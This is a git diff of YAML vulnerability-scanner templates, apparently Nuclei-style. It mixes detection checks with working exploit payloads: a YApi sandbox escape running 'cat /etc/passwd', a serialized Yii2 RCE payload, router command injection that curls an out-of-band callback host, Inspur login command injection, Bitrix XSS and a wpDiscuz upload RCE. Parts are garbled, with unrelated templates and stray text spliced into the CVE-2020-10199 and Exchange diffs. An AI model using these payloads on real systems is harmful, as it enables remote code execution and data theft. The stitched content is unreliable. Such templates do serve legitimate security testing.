0266733f40..2c4a1de6ba 100644 --- a/poc/api/swagger-api-10593.yaml +++ b/poc/api/swagger-api-10593.yaml @@ -1,12 +1,16 @@ id: swagger-api info: name: Public Swagger API - author: pdteam + author: pdteam,c-sh0 severity: info tags: exposure,api,swagger requests: - method: GET path: + - "{{BaseURL}}/swagger-ui/swagger-ui.js" + - "{{BaseURL}}/swagger/swagger-ui.js" + - "{{BaseURL}}/swagger-ui.js" + - "{{BaseURL}}/swagger/ui/swagger-ui.js" - "{{BaseURL}}/swagger/ui/index" - "{{BaseURL}}/swagger/index.html" - "{{BaseURL}}/swagger-ui.html" @@ -14,6 +18,7 @@ requests: - "{{BaseURL}}/api/swagger-ui.html" - "{{BaseURL}}/api-docs/swagger.json" - "{{BaseURL}}/api-docs/swagger.yaml" + - "{{BaseURL}}/api_docs" - "{{BaseURL}}/swagger.json" - "{{BaseURL}}/swagger.yaml" - "{{BaseURL}}/swagger/v1/swagger.json" @@ -48,6 +53,7 @@ requests: - "{{BaseURL}}/api/v1/swagger-ui/swagger.json" - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml" - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs" + - "{{BaseURL}}/api/swagger_doc.json" stop-at-first-match: true matchers-condition: and matchers: @@ -62,3 +68,9 @@ requests: - type: status status: - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - " @version (v[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})" diff --git a/poc/api/twilio-api.yaml b/poc/api/twilio-api.yaml index 9895746a8a..94674dffe2 100644 --- a/poc/api/twilio-api.yaml +++ b/poc/api/twilio-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,6 @@ file: extractors: - type: regex regex: - - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" \ No newline at end of file + - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" + +# digest: 4b0a00483046022100de47f62e4aba3b07360714c3650501e642d180616b8fadb9c6af82114a17dcbe022100838e8bb6b140938d0a973f78addd50f15927ce43b471f402373a3a8676b4f889:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/wadl-api-11083.yaml b/poc/api/wadl-api-11083.yaml index 35e018d786..1e046a7ef3 100644 --- a/poc/api/wadl-api-11083.yaml +++ b/poc/api/wadl-api-11083.yaml @@ -1,10 +1,10 @@ id: wadl-api info: name: wadl file disclosure - author: 0xrudra & manuelbua + author: 0xrudra,manuelbua severity: info tags: exposure,api - reference: | + reference: - https://github.com/dwisiswant0/wadl-dumper - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ requests: @@ -15,26 +15,24 @@ requests: - "{{BaseURL}}/api/application.wadl" - "{{BaseURL}}/api/v1/application.wadl" - "{{BaseURL}}/api/v2/application.wadl" + stop-at-first-match: true matchers: - name: http-get type: word words: - "This is simplified WADL with user and core resources only" - - "\"http://jersey.java.net/\"" + - "http://jersey.java.net" - "http://wadl.dev.java.net/2009/02" - condition: or - part: body - method: OPTIONS path: - "{{BaseURL}}" - "{{BaseURL}}/api/v1" - "{{BaseURL}}/api/v2" + stop-at-first-match: true matchers: - name: http-options type: word words: - "This is simplified WADL with user and core resources only" - - "\"http://jersey.java.net/\"" + - "http://jersey.java.net" - "http://wadl.dev.java.net/2009/02" - condition: or - part: body diff --git a/poc/api/yapi-detect.yaml b/poc/api/yapi-detect.yaml index 8cf92f5a49..3d24ff00ba 100644 --- a/poc/api/yapi-detect.yaml +++ b/poc/api/yapi-detect.yaml @@ -3,12 +3,13 @@ info: name: YApi Detect author: pikpikcu severity: info + metadata: + shodan-query: http.title:"YApi" tags: tech,yapi requests: - method: GET path: - - "{{BaseURL}}/" - - "{{BaseURL}}:3000" + - "{{BaseURL}}" matchers-condition: and matchers: - type: word diff --git a/poc/api/yapi-rce-11726.yaml b/poc/api/yapi-rce-11726.yaml index 0078f2b883..0afebedde5 100644 --- a/poc/api/yapi-rce-11726.yaml +++ b/poc/api/yapi-rce-11726.yaml @@ -1,17 +1,19 @@ id: yapi-rce - info: - name: Yapi Remote Code Execution + name: Yapi - Remote Code Execution author: pikpikcu severity: critical - description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. + description: Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. reference: - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - https://twitter.com/sec715/status/1415484190561161216 - https://github.com/YMFE/yapi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: yapi,rce - requests: - raw: - | # REQUEST 1 @@ -19,42 +21,35 @@ requests: Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 - {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} - + {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"} - | # REQUEST 2 GET /api/group/list HTTP/1.1 Host: {{Hostname}} Content-Type: application/json, text/plain, */* - - | # REQUEST 3 POST /api/project/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} - - | # REQUEST 4 GET /api/project/get?id={{project_id}} HTTP/1.1 Host: {{Hostname}} - - | # REQUEST 5 POST /api/interface/add HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} - - | # REQUEST 6 POST /api/plugin/advmock/save HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} - - | # REQUEST 7 GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true extractors: - type: regex @@ -64,7 +59,6 @@ requests: part: body regex: - '"_id":([0-9]+),"group_name"' - - type: regex name: interface_id group: 1 @@ -72,7 +66,6 @@ requests: part: body regex: - '"req_body_form":\[\],"_id":([0-9]+)' - - type: regex name: project_id group: 1 @@ -80,14 +73,14 @@ requests: part: body regex: - '"tag":\[\],"_id":([0-9]+)' - matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - - type: status status: - 200 + +# Enhanced by mp on 2022/06/03 diff --git a/poc/atlassian/atlassian-crowd-panel-583.yaml b/poc/atlassian/atlassian-crowd-panel-583.yaml index 4fd18bcda4..c2f2c4aa9d 100644 --- a/poc/atlassian/atlassian-crowd-panel-583.yaml +++ b/poc/atlassian/atlassian-crowd-panel-583.yaml @@ -1,11 +1,8 @@ id: atlassian-crowd-panel - info: name: Atlassian Crowd panel detect author: organiccrap severity: info - tags: panel - requests: - method: GET path: diff --git a/poc/atlassian/atlassian-crowd-panel.yaml b/poc/atlassian/atlassian-crowd-panel.yaml index 3532e9a84c..d01a865ee9 100644 --- a/poc/atlassian/atlassian-crowd-panel.yaml +++ b/poc/atlassian/atlassian-crowd-panel.yaml @@ -1,25 +1,16 @@ id: atlassian-crowd-panel - info: - name: Atlassian Crowd Login Panel + name: Atlassian Crowd panel detect author: organiccrap - severity: info - description: An Atlassian Crowd login panel was discovered. - reference: - - https://www.atlassian.com/ - classification: - cwe-id: CWE-200 - tags: panel,atlassian - + severity: low requests: - method: GET path: - '{{BaseURL}}/crowd/console/login.action' - + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers: - type: word words: -
This domain is for use in illustrative examples in documents.'
+ part: body
diff --git a/poc/cve/CVE-2020-10199.yaml b/poc/cve/CVE-2020-10199.yaml
index 21a289174a..94ec25d713 100644
--- a/poc/cve/CVE-2020-10199.yaml
+++ b/poc/cve/CVE-2020-10199.yaml
@@ -1,24 +1,24 @@
id: CVE-2020-2199
info:
- name: Nexus Repository Manager RCE
+ name: Jenkins Subversion Partial Release Manager XSS
author: medbsq
- severity: high
-#https://www.cvebase.com/cve/2020/10199
+ severity: medium
+
requests:
- method: POST
path:
- - "{{BaseURL}}/rest/beta/repositories/go/group"
+ - "{{BaseURL}}/scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://jz: This domain is for use in illustrative examples in documents.'
part: body
-
- type: regex
name: resolve-timeout-error-present
regex:
- '(?mi)Exceeded .*? binding timeout while resolving name'
part: body
-
- type: regex
name: dynbind-error-present
regex:
diff --git a/poc/detect/lucee-detect-8661.yaml b/poc/detect/lucee-detect-8661.yaml
index c6751e5e62..773582565f 100644
--- a/poc/detect/lucee-detect-8661.yaml
+++ b/poc/detect/lucee-detect-8661.yaml
@@ -1,15 +1,24 @@
id: lucee-detect
+
info:
name: Detect Lucee
- author: geeknik
- description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development -- https://github.com/lucee/Lucee/
+ author: geeknik,DhiyaneshDK
severity: info
+ description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development -- https://github.com/lucee/Lucee/
+ metadata:
+ max-request: 2
+ shodan-query: "html:\"Lucee\""
+ fofa-query: "app=\"Lucee-Engine\""
tags: tech,lucee
-requests:
+
+http:
- method: GET
path:
+ - "{{BaseURL}}/lucee/doc/functions.cfm"
- "{{BaseURL}}"
- matchers-condition: and
+
+ stop-at-first-match: true
+ matchers-condition: or
matchers:
- type: regex
part: header
@@ -18,6 +27,9 @@ requests:
- "(?i)X-CB-Server: LUCEE"
- "(?i)X-IDG-Appserver: Lucee"
condition: or
- - type: status
- status:
- - 200
+
+ - type: word
+ part: body
+ words:
+ - "Lucee Function Reference"
+# digest: 4a0a00473045022075f26792907c6d74be5f38bbe41be081199595519e306502ecd4bdfee409f2f7022100b02b3b2ac7b94271edb6835e15e0b302f6270605125e9312412d075effba137d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/detect/lucee-detect.yaml b/poc/detect/lucee-detect.yaml
index c6751e5e62..e4cd2663f7 100644
--- a/poc/detect/lucee-detect.yaml
+++ b/poc/detect/lucee-detect.yaml
@@ -4,13 +4,14 @@ info:
author: geeknik
description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development -- https://github.com/lucee/Lucee/
severity: info
- tags: tech,lucee
+
requests:
- method: GET
path:
- "{{BaseURL}}"
- matchers-condition: and
+
matchers:
+
- type: regex
part: header
regex:
@@ -18,6 +19,3 @@ requests:
- "(?i)X-CB-Server: LUCEE"
- "(?i)X-IDG-Appserver: Lucee"
condition: or
- - type: status
- status:
- - 200
diff --git a/poc/detect/magmi-detect.yaml b/poc/detect/magmi-detect.yaml
index a18b5b4ae5..b78bd29310 100644
--- a/poc/detect/magmi-detect.yaml
+++ b/poc/detect/magmi-detect.yaml
@@ -3,7 +3,7 @@ info:
name: MAGMI (Magento Mass Importer) Plugin Detect
author: dwisiswant0
severity: info
- tags: magento,magmi
+ tags: magento,magmi,plugin
requests:
- method: GET
path:
diff --git a/poc/detect/microsoft-echange-server-detect.yaml b/poc/detect/microsoft-echange-server-detect.yaml
index a07f331300..10eacbc4b1 100644
--- a/poc/detect/microsoft-echange-server-detect.yaml
+++ b/poc/detect/microsoft-echange-server-detect.yaml
@@ -1,5 +1,4 @@
id: microsoft-exchange-server-detect
-
info:
name: Microsoft Exchange Server Detect
author: pikpikcu,dhiyaneshDK
@@ -7,25 +6,20 @@ info:
reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse
description: Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065, using Outlook Web App path data.
tags: microsoft,exchange,tech
-
requests:
- method: GET
path:
- "{{BaseURL}}/owa/auth/logon.aspx"
-
matchers-condition: or
matchers:
-
- type: regex
regex:
- "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)"
part: all
-
- type: word
words:
- 'zie"
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Content-Type: application/json
- body: "{\"name\": \"internal\",\"online\": true,\"storage\": {\"blobStoreName\": \"default\",\"strictContentTypeValidation\": true},\"group\": {\"memberNames\": [\"$\\c{ 1337 * 1337 }\"]}}"
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
matchers-condition: and
matchers:
- type: word
words:
- - "1787569"
- part: body
+ - "pwn.seam"
+ - "?pwned="
+ condition: and
+ part: header
- type: status
status:
- - 400
+ - 200
diff --git a/poc/cve/CVE-2020-11738.yaml b/poc/cve/CVE-2020-11738.yaml
index 280607b065..6b169370b6 100644
--- a/poc/cve/CVE-2020-11738.yaml
+++ b/poc/cve/CVE-2020-11738.yaml
@@ -1,4 +1,5 @@
id: CVE-2020-11738
+
info:
name: WordPress Duplicator plugin Directory Traversal
author: dwisiswant0
@@ -9,17 +10,11 @@ info:
According to the vendor, the vulnerability was only in two
versions v1.3.24 and v1.3.26, the vulnerability wasn't
present in versions 1.3.22 and before.
- reference:
+
+ References:
- https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild
- - https://snapcreek.com/duplicator/docs/changelog/?lite
- - https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/
- - http://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cve-id: CVE-2020-11738
- cwe-id: CWE-22
- tags: cve,cve2020,wordpress,wp-plugin,lfi,kev
+ tags: cve,cve2020,wordpress,wp-plugin,lfi
+
requests:
- method: GET
path:
@@ -39,7 +34,7 @@ requests:
part: header
- type: regex
regex:
- - "root:.*:0:0:"
+ - "root:[x*]:0:0:"
- "define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"
condition: or
- part: body
+ part: body
\ No newline at end of file
diff --git a/poc/cve/CVE-2020-13483.yaml b/poc/cve/CVE-2020-13483.yaml
index 93175bfeeb..7f6b791d4b 100644
--- a/poc/cve/CVE-2020-13483.yaml
+++ b/poc/cve/CVE-2020-13483.yaml
@@ -2,29 +2,40 @@ id: CVE-2020-13483
info:
name: Bitrix24 through 20.0.0 allows XSS
- author: pikpikcu
- severity: high
- reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
+ author: pikpikcu,3th1c_yuk1
+ severity: medium
description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
+ reference:
+ - https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
+ - https://twitter.com/brutelogic/status/1483073170827628547
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2020-13483
+ cwe-id: CWE-79
tags: cve,cve2020,xss,bitrix
requests:
- method: GET
path:
+ - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
+ part: body
words:
+ - '*/)});function __MobileAppList(){alert(1)}//'
- "function(handler){};function __MobileAppList(test){alert(document.domain);};//"
- part: body
+ condition: or
- type: word
+ part: header
words:
- text/html
- part: header
- type: status
status:
diff --git a/poc/cve/CVE-2020-13700.yaml b/poc/cve/CVE-2020-13700.yaml
index 645363a779..42d1d0f6e1 100644
--- a/poc/cve/CVE-2020-13700.yaml
+++ b/poc/cve/CVE-2020-13700.yaml
@@ -6,10 +6,15 @@ info:
severity: high
reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
description: |
- An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
- It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
- wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
- tags: cve,cve2020,wordpress
+ An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
+ It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
+ wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
+ tags: cve,cve2020,wordpress,plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2020-13700
+ cwe-id: CWE-639
requests:
- method: GET
diff --git a/poc/cve/CVE-2020-14413.yaml b/poc/cve/CVE-2020-14413.yaml
index e260ce4ca9..5cbe2e48a3 100644
--- a/poc/cve/CVE-2020-14413.yaml
+++ b/poc/cve/CVE-2020-14413.yaml
@@ -7,11 +7,6 @@ info:
reference: https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8
description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.
tags: cve,cve2020,nedi,xss
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
- cve-id: CVE-2020-14413
- cwe-id: CWE-79
requests:
- method: GET
diff --git a/poc/cve/CVE-2020-15148.yaml b/poc/cve/CVE-2020-15148.yaml
index a9e3680ead..34b71f6245 100644
--- a/poc/cve/CVE-2020-15148.yaml
+++ b/poc/cve/CVE-2020-15148.yaml
@@ -1,15 +1,28 @@
id: CVE-2020-15148
info:
- name: Yii 2 (yiisoft/yii2) RCE
+ name: Yii 2 < 2.0.38 - Remote Code Execution
author: pikpikcu
- severity: high
- reference: |
- - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
- - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
+ severity: critical
+ description: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input.
+ reference:
+ - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
+ - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
+ - https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99
+ - https://github.com/yiisoft/yii2/security/advisories/GHSA-699q-wcff-g9mj
+ remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2020-15148
+ cwe-id: CWE-502
+ cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:*
+ epss-score: 0.01843
tags: cve,cve2020,rce,yii
+ metadata:
+ max-request: 1
-requests:
+http:
- method: GET
path:
- "{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="
@@ -19,9 +32,11 @@ requests:
- type: word
words:
- "total"
- - "internal server error"
+ - "An internal server error occurred."
condition: and
- type: status
status:
- 500
+
+# Enhanced by mp on 2022/04/27
diff --git a/poc/cve/CVE-2020-17456.yaml b/poc/cve/CVE-2020-17456.yaml
index fba91c11a2..8d4fa7417d 100644
--- a/poc/cve/CVE-2020-17456.yaml
+++ b/poc/cve/CVE-2020-17456.yaml
@@ -5,18 +5,31 @@ info:
author: gy741,edoardottt
severity: critical
description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page.
+ remediation: |
+ Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
reference:
- https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/
- https://nvd.nist.gov/vuln/detail/CVE-2020-17456
- http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html
+ - http://packetstormsecurity.com/files/166273/Seowon-SLR-120-Router-Remote-Code-Execution.html
+ - https://www.exploit-db.com/exploits/50821
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-17456
cwe-id: CWE-78
+ epss-score: 0.97074
+ epss-percentile: 0.99709
+ cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: seowonintech
+ product: slc-130_firmware
tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve
+variables:
+ useragent: '{{rand_base(6)}}'
-requests:
+http:
- raw:
- |
POST /cgi-bin/login.cgi HTTP/1.1
@@ -31,9 +44,10 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://{{interactsh-url}}&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
+ Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
cookie-reuse: true
+
matchers-condition: and
matchers:
- type: word
@@ -41,6 +55,11 @@ requests:
words:
- "http"
+ - type: word
+ part: interactsh_request
+ words:
+ - "User-Agent: {{useragent}}"
+
- type: word
part: header
words:
@@ -50,4 +69,4 @@ requests:
status:
- 200
-# Enhanced by mp on 2022/04/27
+# digest: 4a0a0047304502207efe0e5176d8b7d54f1dda7435cf09de296c0603142b0b3cafc19e0ac334d3e2022100e45da5c829c62d576a067a9de1f1d6f5e1eb96aaeb6f56b8604bd7df5765d874:922c64590222798bb761d5b6d8e72950
diff --git a/poc/cve/CVE-2020-21224.yaml b/poc/cve/CVE-2020-21224.yaml
index 4b25b87e1f..1e84564e2d 100644
--- a/poc/cve/CVE-2020-21224.yaml
+++ b/poc/cve/CVE-2020-21224.yaml
@@ -7,11 +7,6 @@ info:
description: A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server
reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
tags: cve,cve2020,clusterengine,rce
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
- cve-id: CVE-2020-21224
- cwe-id: CWE-88
requests:
- method: POST
@@ -22,7 +17,7 @@ requests:
Referer: "{{Hostname}}/module/login/login.html"
body: |
- op=login&username=;`cat /etc/passwd`&password=
+ op=login&username=;`cat /etc/passwd`&password=
matchers-condition: and
matchers:
diff --git a/poc/cve/CVE-2020-24186.yaml b/poc/cve/CVE-2020-24186.yaml
index db823bc245..3889ec4b1a 100644
--- a/poc/cve/CVE-2020-24186.yaml
+++ b/poc/cve/CVE-2020-24186.yaml
@@ -6,7 +6,12 @@ info:
severity: critical
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
- tags: cve,cve2020,wordpress,wp-plugin,rce
+ tags: cve,cve2020,wordpress,wp-plugin,rce,upload
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.00
+ cve-id: CVE-2020-24186
+ cwe-id: CWE-434
requests:
- raw:
@@ -14,25 +19,14 @@ requests:
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
Accept: */*
- Connection: close
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
- Content-Length: 745
- Accept: */*
X-Requested-With: XMLHttpRequest
- sec-ch-ua-mobile: ?0
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
Origin: {{BaseURL}}
- Sec-Fetch-Site: same-origin
- Sec-Fetch-Mode: cors
- Sec-Fetch-Dest: empty
Referer: {{BaseURL}}
- Accept-Encoding: gzip, deflate
- Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
- Connection: close
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="action"
diff --git a/poc/cve/CVE-2020-24571.yaml b/poc/cve/CVE-2020-24571.yaml
index 3e8f391472..7ac3c519d7 100644
--- a/poc/cve/CVE-2020-24571.yaml
+++ b/poc/cve/CVE-2020-24571.yaml
@@ -6,6 +6,11 @@ info:
description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal.
reference: https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371
tags: cve,cve2020,nexusdb,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2020-24571
+ cwe-id: CWE-22
requests:
- method: GET
diff --git a/poc/cve/CVE-2020-24579.yaml b/poc/cve/CVE-2020-24579.yaml
index 59e567cfe4..5f354d7712 100644
--- a/poc/cve/CVE-2020-24579.yaml
+++ b/poc/cve/CVE-2020-24579.yaml
@@ -1,48 +1,48 @@
id: CVE-2020-24579
info:
- name: D-Link DSL 2888a - Authentication Bypass/Remote Command Execution
+ name: DLINK DSL 2888a RCE
author: pikpikcu
- severity: high
- description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.
- reference:
- - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
- - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/
- - https://nvd.nist.gov/vuln/detail/CVE-2020-24579
- classification:
- cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.8
- cve-id: CVE-2020-24579
- cwe-id: CWE-287
- epss-score: 0.00215
+ severity: medium
+ description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.
+ reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
tags: cve,cve2020,dlink,rce
- metadata:
- max-request: 2
-http:
+requests:
- raw:
- | # Response:Location: /page/login/login_fail.html
POST / HTTP/1.1
Host: {{Hostname}}
